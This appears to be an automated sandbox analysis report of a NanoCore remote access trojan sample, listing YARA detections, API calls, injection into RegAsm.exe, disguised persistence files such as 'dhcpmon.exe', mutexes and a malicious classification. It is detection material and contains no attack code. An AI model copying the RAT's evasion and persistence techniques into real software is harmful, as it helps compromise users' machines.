Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 7108, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: e5bd3238d220c97cd4d6969abb3b33e0.exe PID: 2152, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.5210000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.54b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.RegAsm.exe.54b0000.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/7@6/2

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2A2D5 GetLastError,FormatMessageW,		0_2_00A2A2D5
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2A2D5 GetLastError,FormatMessageW,		0_2_00A2A2D5

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18713 AdjustTokenPrivileges,CloseHandle,	0_2_00A18713
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00A18CC3
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18713 AdjustTokenPrivileges,CloseHandle,	0_2_00A18713
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00A18CC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB10DA AdjustTokenPrivileges,	1_2_04EB10DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04EB10A3 AdjustTokenPrivileges,	1_2_04EB10A3

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,		0_2_00A2B59E
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,		0_2_00A2B59E

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,		0_2_00A23E91
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A23E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,		0_2_00A23E91

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2BBA6 CoInitialize,CoCreateInstance,CoUninitialize,		0_2_00A2BBA6
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A2BBA6 CoInitialize,CoCreateInstance,CoUninitialize,		0_2_00A2BBA6

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,		0_2_009C4FE9
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,		0_2_009C4FE9

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Program Files (x86)\DHCP Monitor			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Program Files (x86)\DHCP Monitor			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\hdwwiz			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\hdwwiz			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{ebebb95b-836f-4d8b-92f1-dafac3cec9d8}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{ebebb95b-836f-4d8b-92f1-dafac3cec9d8}

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File read: C:\Users\desktop.ini			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File read: C:\Users\desktop.ini			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	ReversingLabs: Detection: 68%
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File read: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File read: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior
Source: unknown	Process created: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe 'C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat 'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll			Jump to behavior

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static file information: File size 1124888 > 1048576
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static file information: File size 1124888 > 1048576

